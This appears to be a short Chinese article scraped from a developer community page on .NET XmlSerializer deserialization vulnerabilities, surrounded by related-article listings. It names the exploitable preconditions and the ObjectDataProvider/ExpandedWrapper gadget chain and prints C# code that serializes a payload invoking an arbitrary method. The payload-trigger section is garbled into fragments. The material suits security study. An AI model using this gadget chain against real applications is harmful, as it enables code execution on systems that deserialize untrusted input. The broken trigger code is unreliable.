备案控制台

开发者社区

开发者社区安全文章正文

.Net反序列化漏洞之XmlSerializer

2017-11-09 1463

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

条件：

初始化对象时，类型可控：new XmlSerializer(type可控)
反序列化对象时，输入内容可控：serializer.Deserialize(fi可控)

两个关键类：ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成：

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

触发Payload：

public static void deserializeObjectWithXmlSer()
        newtypeofnew"d:/tmp/xmlser.txt" ，如需转载请自行联系原作者

文章标签：

安全

关键词：

.NET反序列化

.NET xmlserializer

.NET反序列化漏洞

技术小甜

目录

相关文章

红目香薰

|

存储 JSON JavaScript

.NET MVC第九章、Web Api Json序列化与反序列化

.NET MVC第九章、Web Api Json序列化与反序列化

红目香薰

173 0 0

.NET MVC第九章、Web Api Json序列化与反序列化

追逐时光者

|

XML JSON 数据格式

.NET中XML序列化和反序列化常用类和用来控制XML序列化的属性总结(XmlSerializer，XmlTypeAttribute，XmlElementAttribute，XmlAttributeAttribute，XmlArrayAttribute...)

.NET中XML序列化和反序列化常用类和用来控制XML序列化的属性总结(XmlSerializer，XmlTypeAttribute，XmlElementAttribute，XmlAttributeAttribute，XmlArrayAttribute...)

追逐时光者

244 0 0

追逐时光者

|

JSON 数据格式

将JSON字符串反序列化为指定的.NET对象类型

将JSON字符串反序列化为指定的.NET对象类型

追逐时光者

142 0 0

馨语随风飞

|

JSON 前端开发数据格式

.net MVC 使用 JSON JavaScriptSerializer 进行序列化或反序列化时出错，字符串的长度超过了为 maxJsonLength 属性设置的值

在.net mvc的controller中，方法返回JsonResult，一般我们这么写： [HttpPost] public JsonResult QueryFeature(string url, string whereClause) { string str=""; return Json(str); } 　　此时如果str过长，就会报“使用 JSON JavaScriptSerializer 进行序列化或反序列化时出错，字符串的长度超过了为 maxJsonLength 属性设置的值”。

馨语随风飞

2825 0 0

杰克.陈

|

JSON JavaScript 前端开发

.NET中JSON的序列化和反序列化的几种方式

原文:.NET中JSON的序列化和反序列化的几种方式一、什么是JSON JSON(JavaScript Object Notation, JS 对象简谱) 是一种轻量级的数据交换格式。它基于ECMAScript(欧洲计算机协会制定的js规范)的一个子集，采用完全独立于编程语言的文本格式来存储和表示数据。

杰克.陈

1035 0 0

swjian1997

|

XML JSON 数据格式

.Net 序列化和反序列化SerializerHelper

　　开始以为SerializerHelper类是项目中已包含的，后来在别的解决方案中测试代码才发现SerializerHelper类是自己写的。 using System; using System.

swjian1997

947 0 0

技术小甜

|

安全

.Net反序列化漏洞之BinaryFormatter

技术小甜

1567 0 0

技术小美

|

XML 数据格式存储

.Net 中的序列化与反序列化 (转)

技术小美

973 0 0

刘洪峰iot

|

XML 数据格式

.net精简框架集（WinCE平台下），XML反序列化成功与否与时间相关

在WinCE 4.2(.net精简框架集 2.0) 下反序列化一个XML文件，发现反序列化成功与否和时间相关。

刘洪峰iot

571 0 0

亚丁号

|

4月前

|

开发框架前端开发 .NET

ASP.NET CORE 3.1 MVC“指定的网络名不再可用\企图在不存在的网络连接上进行操作”的问题解决过程

ASP.NET CORE 3.1 MVC“指定的网络名不再可用\企图在不存在的网络连接上进行操作”的问题解决过程

亚丁号

45 0 0

热门文章

最新文章

C#/.NET/.NET Core优秀项目和框架2024年3月简报

r语言中对LASSO回归，Ridge岭回归和弹性网络Elastic Net模型实现-4

【干货】Java开发者快速上手.NET指南

.NET开源免费、功能强大的 Windows 截图录屏神器

对象存储oss使用问题之OSS SDK .net 使用下载例程报错如何解决

.NET开源、免费、强大的交互式绘图库

.NET开源免费的Windows快速文件搜索和应用程序启动器

.NET开源快速、强大、免费的电子表格组件

.NET开源、免费、跨平台的Git可视化管理工具

ASP.NET三甲医院手术麻醉信息管理系统源码对接麻醉机、监护仪、血气分析仪

.NET Aspire Preview 4 发布！

ASP.NET体检中心源码，实现检前、检中、检后全流程管理

.NET开源的两款第三方登录整合库

C#/.NET/.NET Core拾遗补漏合集（持续更新）

windows server 2019 安装NET Framework 3.5失败，提示：“安装一个或多个角色、角色服务或功能失败” 解决方案

933.【开发工具】解决idea：Caused by: java.net.BindException: Add

.NET生成MongoDB中的主键ObjectId

企业应用开发中.NET EF常用哪种模式？

C# .NET面试系列九：常见的算法

C# .NET面试系列八：ADO.NET、XML、HTTP、AJAX、WebService

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

将Stable Diffusion模型文件转存到FC环境的NAS